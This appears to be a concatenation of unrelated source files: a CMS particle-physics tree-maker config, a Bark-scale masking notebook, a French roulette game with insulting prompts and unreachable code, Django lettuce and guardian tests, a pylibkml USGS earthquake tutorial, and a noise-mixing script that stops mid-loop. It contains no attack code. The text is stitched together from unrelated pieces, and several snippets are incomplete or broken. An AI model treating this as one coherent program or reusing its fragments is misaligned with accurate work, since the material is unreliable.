"HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165",
# Lepton + 2 Jet
"HLT_Mu30_eta2p1_PFJet150_PFJet50",
"HLT_Mu40_eta2p1_PFJet200_PFJet50",
"HLT_Ele35_CaloIdVT_GsfTrkIdT_PFJet150_PFJet50",
"HLT_Ele45_CaloIdVT_GsfTrkIdT_PFJet200_PFJet50",
# end of triggers
# Event variables
"evt_NGoodVtx",
"evt_LHA_PDF_ID",
"evt_NIsoTrk",
),
singleF = cms.untracked.vstring(
# "evt_MR",
# "evt_MTR",
# "evt_R",
# "evt_R2",
# "evt_MR_Smear",
"MC_part1_factor",
"MC_part1_ID",
"MC_part2_factor",
"MC_part2_ID",
"MC_t_pt",
"MC_t_eta",
"MC_t_phi",
"MC_t_E",
"MC_tbar_pt",
"MC_tbar_eta",
"MC_tbar_phi",
"MC_tbar_E",
"MC_lep_pt",
"MC_lep_eta",
"MC_lep_phi",
"MC_lep_E",
"MC_lep_ID",
"MC_nu_pt",
"MC_nu_eta",
"MC_nu_phi",
"MC_nu_E",
"MC_lepb_pt",
"MC_lepb_eta",
"MC_lepb_phi",
"MC_lepb_E",
"MC_hadW_pt",
"MC_hadW_eta",
"MC_hadW_phi",
"MC_hadW_E",
"MC_hadWs1_pt",
"MC_hadWs1_eta",
"MC_hadWs1_phi",
"MC_hadWs1_E",
"MC_hadWs2_pt",
"MC_hadWs2_eta",
"MC_hadWs2_phi",
"MC_hadWs2_E",
"MC_hadb_pt",
"MC_hadb_eta",
"MC_hadb_phi",
"MC_hadb_E",
"MC_cstar",
"MC_x_F",
"MC_Mtt",
"evt_XSec",
"evt_Gen_Weight",
"evt_Gen_Ht",
"evt_top_pt_rw_v1",
"SUSY_Stop_Mass",
"SUSY_Gluino_Mass",
"SUSY_LSP_Mass",
),
vectorI = cms.untracked.vstring(
#"gen_ID",
#"gen_Status",
#"gen_Mom0ID",
#"gen_Mom0Status",
#"gen_Mom1ID",
#"gen_Mom1Status",
#"gen_Dau0ID",
#"gen_Dau0Status",
#"gen_Dau1ID",
#"gen_Dau1Status",
#AK8_prefix+"_HasNearGenTop",
#AK8_prefix+"_NearGenTopIsHadronic",
#AK8_prefix+"_NearGenWIsHadronic",
#AK8_prefix+"_NearGenWToENu",
#AK8_prefix+"_NearGenWToMuNu",
#AK8_prefix+"_NearGenWToTauNu",
#AK4_prefix+"_looseJetID",
#AK4_prefix+"_tightJetID",
#AK4_prefix+"_tightLepVetoJetID",
#AK8_prefix+"_looseJetID",
#AK8_prefix+"_tightJetID",
#AK8_prefix+"_tightLepVetoJetID",
#AK8sub_prefix+"_looseJetID",
#AK8sub_prefix+"_tightJetID",
#AK8sub_prefix+"_tightLepVetoJetID",
#"el_IsPartOfNearAK4Jet",
#"el_IsPartOfNearAK8Jet",
#"el_IsPartOfNearSubjet",
#"mu_IsPartOfNearAK4Jet",
#"mu_IsPartOfNearAK8Jet",
#"mu_IsPartOfNearSubjet",
#"el_mvaIDvalueHZZ",
"el_IDVeto_NoIso",
"el_IDLoose_NoIso",
"el_IDMedium_NoIso",
"el_IDTight_NoIso",
"el_IsoVeto",
"el_IsoLoose",
"el_IsoMedium",
"el_IsoTight",
"el_IDVeto",
"el_IDLoose",
"el_IDMedium",
"el_IDTight",
),
vectorF = cms.untracked.vstring(
"scale_Weights",
"pdf_Weights",
"alphas_Weights",
"metsyst_MuCleanOnly_Pt",
"metsyst_MuCleanOnly_Phi",
"metsyst_Pt",
"metsyst_Phi",
#"puppimetsyst_Pt",
#"puppimetsyst_Phi",
#"gen_Pt",
#"gen_Eta",
#"gen_Phi",
#"gen_E",
#"gen_Mass",
#"gen_Charge",
#AK8_prefix+"_maxSubjetCSVv2",
#AK8_prefix+"_maxSubjetCMVAv2",
#AK8_prefix+"_DRNearGenTop",
#AK8_prefix+"_DRNearGenWFromTop",
#AK8_prefix+"_DRNearGenBFromTop",
#AK8_prefix+"_DRNearGenLepFromSLTop",
#AK8_prefix+"_DRNearGenNuFromSLTop",
#AK8_prefix+"_PtNearGenTop",
#AK8_prefix+"_PtNearGenBFromTop",
#AK8_prefix+"_PtNearGenWFromTop",
#AK8_prefix+"_PtNearGenLepFromSLTop",
#AK8_prefix+"_PtNearGenNuFromSLTop",
#AK8_prefix+"_softDropMassPuppiUncorr",
#AK8_prefix+"_softDropMassPuppiCorr",
#"el_DRNearGenEleFromSLTop",
#"el_PtNearGenEleFromSLTop",
#"el_PtNearGenTop",
#"el_LepAK4JetFrac",
#"el_LepAK8JetFrac",
#"el_LepSubjetFrac",
#"el_LepAK4JetMassDrop",
#"el_LepAK8JetMassDrop",
#"el_LepSubjetMassDrop",
#"el_AK4JetV1DR",
#"el_AK4JetV2DR",
#"el_AK4JetV3DR",
#"el_AK8JetV1DR",
#"el_AK8JetV2DR",
#"el_AK8JetV3DR",
#"el_SubjetV1DR",
#"el_SubjetV2DR",
#"el_SubjetV3DR",
#"el_AK4JetV1PtRel",
#"el_AK4JetV2PtRel",
#"el_AK4JetV3PtRel",
#"el_AK8JetV1PtRel",
#"el_AK8JetV2PtRel",
#"el_AK8JetV3PtRel",
#"el_SubjetV1PtRel",
#"el_SubjetV2PtRel",
#"el_SubjetV3PtRel",
#"mu_DRNearGenMuFromSLTop",
#"mu_PtNearGenMuFromSLTop",
#"mu_PtNearGenTop",
#"mu_LepAK4JetFrac",
#"mu_LepAK8JetFrac",
#"mu_LepSubjetFrac",
#"mu_LepAK4JetMassDrop",
#"mu_LepAK8JetMassDrop",
#"mu_LepSubjetMassDrop",
#"mu_AK4JetV1DR",
#"mu_AK4JetV2DR",
#"mu_AK4JetV3DR",
#"mu_AK8JetV1DR",
#"mu_AK8JetV2DR",
#"mu_AK8JetV3DR",
#"mu_SubjetV1DR",
#"mu_SubjetV2DR",
#"mu_SubjetV3DR",
#"mu_AK4JetV1PtRel",
#"mu_AK4JetV2PtRel",
#"mu_AK4JetV3PtRel",
#"mu_AK8JetV1PtRel",
#"mu_AK8JetV2PtRel",
#"mu_AK8JetV3PtRel",
#"mu_SubjetV1PtRel",
#"mu_SubjetV2PtRel",
#"mu_SubjetV3PtRel",
),
)
### Filter - Selects events with at least one muon with pt>25, |eta|<3.0
process.MuonCountFilter = cms.EDFilter("PatMuonCountFilter",
    filter = cms.bool(True),
    src = cms.InputTag("slimmedMuons"),
    cut = cms.string("pt>25. && abs(eta)<3.0"),
    minNumber = cms.uint32(1)
)
### Filter - Selects events with at least one electron with pt>25, |eta|<3.0
process.ElectronCountFilter = cms.EDFilter("PatElectronCountFilter",
    filter = cms.bool(True),
    src = cms.InputTag("slimmedElectrons"),
    cut = cms.string("pt>25. && abs(eta)<3.0"),
    minNumber = cms.uint32(1)
)
### Filter - Select only events with at least 4 AK4 jets with pt>20 and |eta|<3.0
process.AK4JetCountFilter = cms.EDFilter("PatJetCountFilter",
    filter = cms.bool(True),
    src = cms.InputTag("slimmedJets"),
    cut = cms.string("pt>20. && abs(eta)<3.0"),
    minNumber = cms.uint32(4)
)
### Filter - Select only events with at least 1 AK8 jet with pt>175 and |eta|<3.0
process.AK8JetCountFilter = cms.EDFilter("PatJetCountFilter",
    filter = cms.bool(True),
    src = cms.InputTag("slimmedJetsAK8"),
    cut = cms.string("pt>175. && abs(eta)<3.0"),
    minNumber = cms.uint32(1)
)
# Optional generator-HT filter, only instantiated when the `genHtFilter`
# flag (defined earlier in this config) is set.
if genHtFilter:
    process.GenHtFilter = cms.EDFilter("SingleFloatFilter",
        src = cms.InputTag("extraVar","evtGenHt"),
        # NOTE(review): presumably keeps only events with generator HT
        # below 600 -- confirm against the SingleFloatFilter implementation.
        max = cms.untracked.double(600),
    )
### B2GTTreeMaker
process.load("Analysis.B2GTTrees.B2GTTreeMaker_cff")
# Adding extra Variables: register the "extraVar" producer's output branches
# with the tree maker, reusing the same branch name lists declared on the
# producer so the two stay in sync.
process.B2GTTreeMaker.physicsObjects.append(
    cms.PSet(
        label = cms.untracked.string("extraVar"),
        prefix_in = cms.untracked.string(""),
        prefix_out = cms.untracked.string(""),
        singleI = process.extraVar.singleI,
        singleF = process.extraVar.singleF,
        vectorI = process.extraVar.vectorI,
        vectorF = process.extraVar.vectorF,
    )
)
# Propagate the data/MC flag (defined earlier in this config) to the tree maker.
process.B2GTTreeMaker.isData = isData
### EventCounter - to be applied before any filter to count
# negative and positive weight events (for NLO samples)
# histo name: NEventNoFilter (bin 1: neg, bin 2: pos weighted events)
process.EventCounter = cms.EDAnalyzer("EventCounter",
    isData = cms.untracked.bool(isData)
)
# Paths: four parallel selections (boosted/resolved x muon/electron).
# Every path runs extraVar and EventCounter FIRST so that the event count
# histogram is filled before any filter can reject the event.
process.analysisPathBoostedMuons = cms.Path(
    process.extraVar *
    process.EventCounter *
    process.MuonCountFilter *      #muon filter
    process.AK8JetCountFilter *    #boosted AK8 jet filter
    process.B2GTTreeMaker)
process.analysisPathBoostedElectrons = cms.Path(
    process.extraVar *
    process.EventCounter *
    process.ElectronCountFilter *  #electron filter
    process.AK8JetCountFilter *    #boosted AK8 jet filter
    process.B2GTTreeMaker)
process.analysisPathResolvedMuons = cms.Path(
    process.extraVar *
    process.EventCounter *
    process.MuonCountFilter *      #muon filter
    process.AK4JetCountFilter *    #resolved AK4 jet filter
    process.B2GTTreeMaker)
process.analysisPathResolvedElectrons = cms.Path(
    process.extraVar *
    process.EventCounter *
    process.ElectronCountFilter *  #electron filter
    process.AK4JetCountFilter *    #resolved AK4 jet filter
    process.B2GTTreeMaker)
|
# coding: utf-8
# ## Example
# * This Python example shows the non-linear superposition with parameter **$2*a=alpha=0.6$, in the Bark scale**. We construct a matrix which does the actual superposition in the Bark domain, because that is most efficient:
# In[1]:
import numpy as np
def spreadingfunctionmat(maxfreq, nfilts, alpha):
    """Build an nfilts x nfilts matrix of shifted masking spreading functions.

    Arguments:
    maxfreq -- half the sampling frequency (Hz)
    nfilts  -- number of subbands in the Bark domain, for instance 64
    alpha   -- exponent for the non-linear superposition of spreading functions
    """
    mask_offset_db = 14.5 + 12   # Simultaneous masking for tones at Bark band 12
    upper_slope_db = 7.5         # Upper slope of spreading function (dB per Bark)
    lower_slope_db = 26.0        # Lower slope of spreading function (dB per Bark)
    top_bark = hz2bark(maxfreq)
    # Prototype spreading function in dB over twice the Bark range, so that
    # a length-nfilts window can be slid across it for every band below.
    proto_db = np.zeros(2 * nfilts)
    # Upper slope: upper_slope_db attenuation per Bark over the full range,
    # shifted down by the simultaneous-masking offset.
    proto_db[:nfilts] = np.linspace(-top_bark * upper_slope_db, -2.5, nfilts) - mask_offset_db
    # Lower slope: lower_slope_db attenuation per Bark over the full range.
    proto_db[nfilts:] = np.linspace(0, -top_bark * lower_slope_db, nfilts) - mask_offset_db
    # Convert from dB to "voltage", folding in the alpha exponent.
    proto_voltage = 10.0 ** (proto_db / 20.0 * alpha)
    # One shifted copy of the prototype per Bark band, as matrix columns.
    matrix = np.zeros((nfilts, nfilts))
    for band in range(nfilts):
        matrix[:, band] = proto_voltage[nfilts - band:2 * nfilts - band]
    return matrix
# The above produces a prototype of spreading functions for all the bark bands(bark counts based on the resolution)
# Below is the psyacmodel python example
# In[2]:
# Notebook-only magic: render matplotlib figures inline (this line only
# works inside IPython/Jupyter, not as a plain script).
get_ipython().magic(u'matplotlib inline')
from psyacmodel import *
import matplotlib.pyplot as plt
fs=32000     # sampling frequency of audio signal (Hz)
maxfreq=fs/2 # Nyquist frequency
alpha=0.6    #Exponent for non-linear superposition of spreading functions
nfilts=64    #number of subbands in the bark domain
spreadingfuncmatrix=spreadingfunctionmat(maxfreq,nfilts,alpha)
# Visualize the matrix of shifted spreading functions as an image.
plt.imshow(spreadingfuncmatrix)
plt.title('Matrix spreadingfuncmatrix as Image')
plt.xlabel('Bark Domain Subbands')
plt.ylabel('Bark Domain Subbands')
plt.show()
|
#-*-coding:utf-8 -*
import random
import math
# from random import randrange
def verifier_chiffre_correct(question):
    """Prompt until the user enters a strictly positive integer; return it.

    :param question: prompt string shown to the user
    :return: the validated positive integer
    """
    # NOTE(review): this definition is shadowed by the re-definition of the
    # same name further down; only the later one is in effect at call time.
    while True:
        try:
            le_biff = int(raw_input(question))
        except ValueError:
            # Non-numeric input: report and re-prompt. The original fell
            # through with `le_biff` unbound (NameError on the next line)
            # and also left stray debug prints ("TOTO", "TA MAMAN").
            print("La valeur n'est pas correcte")
            continue
        if le_biff <= 0:
            print("La valeur n'est pas correcte")
        else:
            return le_biff
def verifier_chiffre_correct(question):
    """Prompt until the user enters an integer between 0 and 49; return it.

    :param question: prompt string shown to the user
    :return: the validated integer in [0, 49]
    """
    while True:
        try:
            choix = int(raw_input(question))
        except ValueError:
            print("La valeur n'est pas correcte")
        else:
            # BUG FIX: the original tested `choix <= 0 and choix >= 50`,
            # which is always False, so any integer was accepted. The game
            # expects a number between 0 and 49 inclusive.
            if choix < 0 or choix > 49:
                print("La valeur n'est pas correcte")
                continue
            return choix
# Interactive roulette game (Python 2: uses raw_input/input).
le_biff=verifier_chiffre_correct("Combien d'argent voulez-vous apporter à la table :")
print("Votre cagnotte est actuellement de ", le_biff)
choix=verifier_chiffre_correct("Veuillez faire votre choix entre les chiffres 0 et 49 :")
# Even numbers count as red, odd numbers as black.
if choix % 2 == 0:
    print("vous avez choisis le chiffre RED ", choix)
else:
    print("vous avez choisis le chiffre BLACK ", choix)
exit()
# NOTE(review): everything below is unreachable because of the exit() call
# above -- it looks like an older version of the game kept for reference.
choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
while choix<0 or choix>49:
    print("T es con ou tu fais expres ? Je sais pas comment on code autrement, alors fais pas le malin !")
    choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
mise = input("Combien désirez vous miser : ")
if mise < 20:
    print("Et baaaah alors ?? On aurait peur de la banque ? ")
elif mise < 20:
    # NOTE(review): duplicate of the condition above -- this branch can
    # never run (the second test was probably meant to be `mise >= 20`).
    print("Et baaaah voila !! on a enfin compris ! ")
raw_input("Appuyez sur entree ma petite poule")
# Main game loop: keep playing while the player still has money.
while le_biff > 0:
    print("Les jeux sont faits !")
    raw_input("C est le moment ou tu commences a avoir peur ? ALLEZ fais pas le fier !")
    raw_input("RIEN NE VA PLUUUUUUUS")
    s = random.randrange(50)
    if s % 2 == 0:
        print("ET LE NUMERO GAGNANT EST LE rouge :", s)
        raw_input("Je parie que tu te dis que ta femme avait raison.... Me tromp-je ?")
    else:
        print("ET LE NUMERO GAGNANT EST LE noir :", s)
        raw_input("Je parie que tu te dis que ta femme avait raison.... Me tromp-je ?")
    # Payout rules: exact match pays 3x the stake; same parity (colour)
    # refunds half the stake; anything else loses the whole stake.
    if (s == choix):
        print("VOUS AVEZ GAGNEZ ! FELICITATIONS ! vous remportez $ ", mise*3)
        gain = (mise*3)
        le_biff += gain # paul's quick patch?
        print("Il vous reste $",le_biff)
        raw_input("C EST A CE MOMENT LA QUE TU TE DIS QUE SI TU AVAIS MISER PLUS TU AURAIS PU QUITTER TA FEMME")
    elif (s != choix and  # when the drawn number is not the chosen one
          s % 2 == 0 and
          choix % 2 == 0):
        print("Pairs ! Rouges ! Vous recuperez la somme de $", mise*0.5)
        gain = (mise-(mise*0.5))
        le_biff += gain
        print("Il vous reste $", le_biff)
        raw_input("Recuperez...recuperez...je vous croyais ici pour gagner")
    elif(s != choix and
         s % 2 != 0 and
         choix % 2 != 0):
        print("Impairs ! Noirs ! Vous recuperez la somme de $", mise*0.5)
        gain = (mise-(mise*0.5))
        le_biff += gain
        print("Il vous reste $", le_biff)
        raw_input("Recuperez...recuperez...je vous croyais ici pour gagner")
    else :
        print("Perdu ! la banque recupere la somme de $", mise)
        raw_input("Si on additione cela fait quand même.... Roulements de tambours....")
        gain = (-mise)
        le_biff += gain
        print("Il vous reste $", le_biff)
        raw_input("AVEC UN PROGRAMME AUSSI NUL T ES CAPABLE DE PERDRE ? AHAHAHAHHAAHAHAHAHHAAHAHAHAHHAHAAH")
    print(gain)
    # Re-prompt for the next round.
    mise = input("Combien desirer vous miser : ")
    choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
    while choix<0 or choix>49:
        print("Ceci n'est pas possible")
        choix = input("Veuillez faire votre choix entre les chiffres 0 et 49 :")
        mise = input("Combien desirez vous miser : ")
    if mise < 20:
        print("Et baaaah alors ?? On aurait peur de la banque ? ")
    elif mise < 0:
        print("Nan MAIS SERIEUX ????? tu me prends pour un con la ?")
    elif mise > 20:
        print("Et baaaah voila !! on a enfin compris ! ")
    input("Appuyez sur entree ma petite poule")
# def resultat(choix):
# if (s == choix):
# print("VOUS AVEZ GAGNEZ ! FELICITATIONS ! vous remportez $ ", mise*3)
# cagnotte += (mise*3)
# print("Il vous reste $",cagnotte)
# elif (s != choix and # Dans le cas ou ce n'est pas le meme nombre qui sort
# s % 2 == 0 and
# choix % 2 == 0):
# print("Pairs ! Rouges ! Vous reécupérez la somme de $", mise*0.5)
# cagnotte += (mise*0.5)
# print("Il vous reste $",cagnotte)
# elif(s != choix and
# s % 2 != 0 and
# choix % 2 != 0):
# print("Impairs ! Noirs ! Vous récupérez la somme de $", mise*0.5)
# cagnotte += mise*0.5
# print("Il vous reste $", cagnotte)
# else :
# print("Perdu ! la banque recupère la somme de $", mise)
# cagnotte += (-mise)
# print("Il vous reste $", cagnotte)
# resultat(choix)
# Before
|
from lettuce import *
from lxml import html
from django.test.client import Client
from nose.tools import assert_equals, assert_true
import logging
# Send all debug output from the lettuce steps to a local log file.
LOG_FILENAME = 'test-debug.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
@before.all
def set_browser():
    """Create one shared Django test client before the whole feature run."""
    world.browser = Client()
@step(r'I access the url "(.*)"')
def access_url(step, url):
    """Fetch *url* with the shared test client and record the outcome.

    On a 200 the parsed DOM is stored in ``world.dom``; on a 302 only the
    status code and redirect target are stored (``world.dom`` is untouched).
    Other status codes leave ``world`` unchanged.
    """
    response = world.browser.get(url)
    if response.status_code == 200:
        # Only try and generate the DOM if you actually get a valid response
        world.dom = html.fromstring(response.content)
    elif response.status_code == 302:
        world.status_code = response.status_code
        world.location = response['Location']
@step(r'I see the form "(.*)"')
def see_header(step, form_id):
    """Assert that an element with the given id exists in the current DOM."""
    # NOTE(review): this function name is shadowed by the `see_header`
    # defined right below. Lettuce registers the step at decoration time so
    # the step itself still works, but the function should be renamed
    # (e.g. `see_form`) to match its step text and avoid confusion.
    form = world.dom.cssselect('#' + form_id)
    assert_true(form, "There is no form with id " + form_id)
@step(r'I see the header "(.*)"')
def see_header(step, text):
    """Assert that the first <h3> in the DOM has exactly the given text."""
    header = world.dom.cssselect('h3')[0].text.strip()
    assert_equals(
        header,
        text,
        "Did not find header with content '" + text + "'"
    )
@step(u'Then I am redirected to the url "(.*)"')
def then_i_am_redirected_to_the_url(step, url):
    """Assert the previous request produced a 302 pointing at *url*.

    Relies on ``world.status_code``/``world.location`` set by `access_url`.
    """
    assert_equals(302, world.status_code, "Did not receive 302 redirect")
    # .find returns -1 when there is no match
    assert_true(world.location.find(url) >= 0,
                "Was not redirected to the correct location")
|
import pytest
from guardian.shortcuts import get_perms
@pytest.mark.django_db
def test_anonymous_user_has_no_edit_perm(location, guardian_anonymous_user):
    """The guardian anonymous user must never get object-level edit rights."""
    assert 'change_location' not in get_perms(guardian_anonymous_user, location)
@pytest.mark.django_db
def test_user_has_no_edit_perm(location, user):
    """An unrelated user has no edit permission on a location by default."""
    assert 'change_location' not in get_perms(user, location)
@pytest.mark.django_db
def test_creator_gets_edit_perm(location, user):
    """Saving a location with created_by set grants the creator edit rights."""
    # Precondition: the fixture user is not already the creator.
    assert location.created_by_id != user.pk
    assert 'change_location' not in get_perms(user, location)
    location.created_by = user
    location.save()  # the permission is granted as a side effect of save()
    assert 'change_location' in get_perms(user, location)
@pytest.mark.django_db
def test_multiple_saves(location, user):
    """Repeated saves must not toggle the creator's edit permission."""
    # There was a bug that caused multiple saves to toggle the perm
    assert 'change_location' not in get_perms(user, location)
    location.created_by = user
    location.save()
    assert 'change_location' in get_perms(user, location)
    location.save()  # a second save must leave the permission in place
    assert 'change_location' in get_perms(user, location)
@pytest.mark.django_db
def test_municipality_moderator_gets_edit_perm(location, user):
    """Moderator membership on the municipality grants and revokes edit rights."""
    assert 'change_location' not in get_perms(user, location)
    location.municipality.moderators.add(user)
    assert 'change_location' in get_perms(user, location)
    # Removing moderator status must also remove the permission again.
    location.municipality.moderators.remove(user)
    assert 'change_location' not in get_perms(user, location)
|
#Import necessary libraries
from pylibkml import Kml, Utilities
from csv import reader
from string import atof, replace
import urllib2
def process_datetime(datestr):
    '''
    Takes the string value and processes it into something that Google Earth
    can use in its <TimeStamp>

    Example input:  "Friday, April  10, 2009 01:23:45 UTC"
    Example output: "2009-04-10T01:23:45Z"

    Keyword arguments:
    datestr -- (string) The DateTime string
    '''
    # Use str methods instead of the string-module functions: string.replace
    # is deprecated in Python 2 and gone in Python 3, while the behavior here
    # is identical.
    # Get rid of the extra space between the day and month
    datestr = datestr.replace('  ', ' ')
    # Get rid of the commas
    datestr = datestr.replace(',', '')
    # Turn the string into a list: [weekday, month, day, year, time, tz]
    fields = datestr.split(' ')
    # Month names in order, used to derive the numerical month value
    months = ['January', 'February', 'March', 'April', 'May', 'June',
              'July', 'August', 'September', 'October', 'November', 'December']
    month_index = months.index(fields[1]) + 1
    # Build the YYYY-MM-DD part, zero-padding month and day
    date_part = fields[3] + '-' + str(month_index).zfill(2) + '-' + fields[2].zfill(2)
    return date_part + 'T' + fields[4] + 'Z'
def main():
    '''
    A basic tutorial explaining pylibkml
    Extracts from a .csv file and makes a tutorial.kml file

    NOTE(review): Python 2 only -- uses urllib2, file(), and .next().
    '''
    #Code required to grab file from website and save it
    url = 'http://earthquake.usgs.gov/eqcenter/catalogs/eqs7day-M1.txt'
    webFile = urllib2.urlopen(url)
    localFile = open(url.split('/')[-1], 'w')
    localFile.write(webFile.read())
    webFile.close()
    localFile.close()
    inputfile = reader(file(url.split('/')[-1]), delimiter=',')
    inputfile.next() # Get rid of the header information
    #Initialize the Data Lists
    Eqid = [];DateTime = [];Lat=[];Lon=[];Mag=[];Depth=[];NST=[];Location=[]
    #Cycle through the .csv file and extract all necessary data to populate
    #the data lists (column order follows the USGS eqs7day CSV layout)
    for line in inputfile:
        Eqid.append(line[1])
        DateTime.append(line[3])
        Lat.append(line[4])
        Lon.append(line[5])
        Mag.append(line[6])
        Depth.append(line[7])
        NST.append(line[8])
        Location.append(line[9])
    #Create the placemarks with the necessary data
    placemark = []
    for i in range(0,len(Lat)):
        #Create a <coordinate> object (note: KML order is lon, lat)
        coordinate = Kml().create_coordinates(atof(Lon[i]),atof(Lat[i]))
        #Create a <Point> object
        point = Kml().create_point({'coordinates':coordinate})
        #Modify the datestring so that it works with the .kml file
        datestr = process_datetime(DateTime[i])
        #Create the <TimeStamp> object
        timestamp = Kml().create_timestamp({'when':datestr})
        #Create the <Data> objects and place them in <ExtendedData>
        data = []
        data.append(Kml().create_data({'name':'eqid','value':Eqid[i]}))
        data.append(Kml().create_data({'name':'datetime','value':DateTime[i]}))
        data.append(Kml().create_data({'name':'lat','value':Lat[i]}))
        data.append(Kml().create_data({'name':'lon','value':Lon[i]}))
        data.append(Kml().create_data({'name':'mag','value':Mag[i]}))
        data.append(Kml().create_data({'name':'depth','value':Depth[i]}))
        data.append(Kml().create_data({'name':'nst','value':NST[i]}))
        data.append(Kml().create_data({'name':'location','value':Location[i]}))
        extendeddata = Kml().create_extendeddata({'data':data})
        #Create the <Placemark> object
        placemark.append(Kml().create_placemark({'name':Eqid[i],
                                                 'point':point,
                                                 'timestamp':timestamp,
                                                 'extendeddata':extendeddata,
                                                 'styleurl':'#primary-style'}))
    #Create the <Icon> object for the <IconStyle>
    icon_href = 'http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png'
    iconstyleicon = Kml().create_iconstyleicon({'href': icon_href})
    #Create the <IconStyle> object
    iconstyle = Kml().create_iconstyle({'color':'ff0400ff',
                                        'scale' : 1.2,
                                        'colormode': 'normal',
                                        'icon':iconstyleicon})
    #Create the <BalloonStyle> object; $[name] placeholders are filled by
    #Google Earth from the matching <Data> entries above
    balloon_txt = '<![CDATA[<BODY bgcolor="ff0004">\n<h3>USGS Earthquake Data'+\
        '<TABLE BORDER=1>\n'+\
        '<tr><td><b>Earthquake ID</b></td><td>$[eqid]</td></tr>\n'+\
        '<tr><td><b>Date/Time</b></td><td>$[datetime]</td></tr>\n'+\
        '<tr><td><b>Latitude,Longitude</b></td><td>$[lat],$[lon]</td></tr>\n'+\
        '<tr><td><b>Magnitude</b></td><td>$[mag]</td></tr>\n'+\
        '<tr><td><b>Depth</b></td><td>$[depth]</td></tr>\n'+\
        '<tr><td><b>NST</b></td><td>$[nst]</td></tr>\n'+\
        '<tr><td><b>Location</b></td><td>$[location]</td></tr>\n'+\
        '</TABLE>\n</BODY>\n]]>'
    balloonstyle = Kml().create_balloonstyle({'text':balloon_txt,
                                              'bgcolor':'ff0400ff'})
    #Create the <Style> object with <IconStyle> and <BalloonStyle>
    style = []
    style.append(Kml().create_style({'id':'primary-style',
                                     'balloonstyle':balloonstyle,
                                     'iconstyle':iconstyle}))
    #Put the Placemarks in a <Folder> object
    folder = []
    folder.append(Kml().create_folder({'name':'USGS Earthquakes',
                                       'placemark':placemark}))
    #Demonstrating a Doughnut shaped Polygon: outer ring minus inner ring
    coord_out = [(-122.366278,37.818844,30),
                 (-122.365248,37.819267,30),
                 (-122.365640,37.819861,30),
                 (-122.366669,37.819429,30),
                 (-122.366278,37.818844,30)]
    coord_out = Kml().create_coordinates(coord_out)
    outer_ring = Kml().create_linearring({'coordinates':coord_out})
    outerboundary = Kml().create_outerboundaryis({'linearring':outer_ring})
    coord_in = [(-122.366212,37.818977,30),
                (-122.365424,37.819294,30),
                (-122.365704,37.819731,30),
                (-122.366488,37.819402,30),
                (-122.366212,37.818977,30)]
    coord_in = Kml().create_coordinates(coord_in)
    inner_ring = Kml().create_linearring({'coordinates':coord_in})
    innerboundary = Kml().create_innerboundaryis({'linearring':inner_ring})
    polygon = Kml().create_polygon({'extrude':1,
                                    'altitudemode':'relativetoground',
                                    'innerboundaryis':innerboundary,
                                    'outerboundaryis':outerboundary})
    placemark = Kml().create_placemark({'name':'Sample Doughnut Polygon',
                                        'polygon':polygon,
                                        'styleurl':'#poly-style'})
    folder.append(Kml().create_folder({'name':'Sample Polygons',
                                       'placemark':placemark}))
    #<Style> for the <Polygon> demonstration
    polystyle = Kml().create_polystyle({'color':'ffff0000',
                                        'fill':1,
                                        'outline':1})
    style.append(Kml().create_style({'id':'poly-style',
                                     'polystyle':polystyle}))
    #Put everything in a <Document> object
    document = Kml().create_document({'folder':folder,
                                      'style':style})
    #Create the final <Kml> object
    kml = Kml().create_kml({'document':document})
    #Write the Kml object to tutorial.kml
    toFile = open('tutorial.kml','w')
    toFile.write(Utilities().SerializePretty(kml))
    toFile.close()

if __name__ == '__main__':
    main()
|
import os
import io_function as iof
import signal_processing as sp
# Configuration: clean speech inputs, noise sources, and the output folder.
input_file_dir = 'C:/Users/유정찬/Desktop/test/clean_test'
noise_file_dir = 'C:/Users/유정찬/Desktop/test/noise'
output_file_dir = 'C:/Users/유정찬/Desktop/test/noisy_test'
# NOTE(review): presumably selects between plain SNR and segmental SNR in
# sp.mix_noise -- confirm against signal_processing.mix_noise.
snr_or_ssnr = 'ssnr'
target_dB = 10       # target mixing level in dB, passed to sp.mix_noise
frame_size = 1600    # frame length (samples) used by sp.mix_noise
# check input, noise directory: each path may be a directory (all .wav files
# inside are used) or a single file.
input_is_dir = os.path.isdir(input_file_dir)
noise_is_dir = os.path.isdir(noise_file_dir)
if input_is_dir:
    input_file_list = iof.read_dir_list(input_file_dir, extention='wav')
else:
    input_file_list = [input_file_dir]
if noise_is_dir:
    noise_file_list = iof.read_dir_list(noise_file_dir, extention='wav')
else:
    noise_file_list = [noise_file_dir]
# Fail fast when either side produced no files to work with.
if len(input_file_list)==0:
    raise Exception("ERROR: Input file is not exist")
if len(noise_file_list)==0:
    raise Exception("ERROR: Noise file is not exist")
# make noise set: concatenate all (power-normalized) noise files into one
# long signal that will be consumed piecewise while mixing.
old_sample_rate = 0
temp_sample_rate = 0
noise_signal_train = []
print('Processing noise file.')
i = 0
for wav_file in noise_file_list:
    i += 1
    print('Processing({}) {}/{} ...'.format(wav_file, i, len(noise_file_list)))
    temp_noise_signal, temp_sample_rate = iof.read_wav(wav_file)
    # All noise files must share one sample rate; 0 marks "not yet seen".
    if old_sample_rate != 0 and old_sample_rate != temp_sample_rate:
        raise Exception("ERROR: Different sample rate is exist.")
    else:
        old_sample_rate = temp_sample_rate
    # Normalize each noise file to unit power before concatenating.
    temp_noise_signal = sp.change_power(temp_noise_signal, 1)
    noise_signal_train.extend(temp_noise_signal)
# mix noise: for each clean file, take an equally long slice of the
# concatenated noise train (wrapping around at the end), mix at target_dB,
# and write the result mirroring the input directory structure.
old_sample_rate = 0
temp_sample_rate = 0
noise_start_point = 0
print('Generate noisy file.')
i = 0
for wav_file in input_file_list:
    i += 1
    print('Processing({}) {}/{} ...'.format(wav_file, i, len(input_file_list)))
    temp_input_signal, temp_sample_rate = iof.read_wav(wav_file)
    # All input files must share one sample rate as well.
    if old_sample_rate != 0 and old_sample_rate != temp_sample_rate:
        raise Exception("ERROR: Different sample rate is exist.")
    else:
        old_sample_rate = temp_sample_rate
    # Collect exactly len(temp_input_signal) noise samples, wrapping around
    # the noise train when it is exhausted.
    temp_noise_signal = []
    left_size = len(temp_input_signal)
    while left_size > 0:
        available_length = len(noise_signal_train)-noise_start_point
        available_length = min(available_length, left_size)
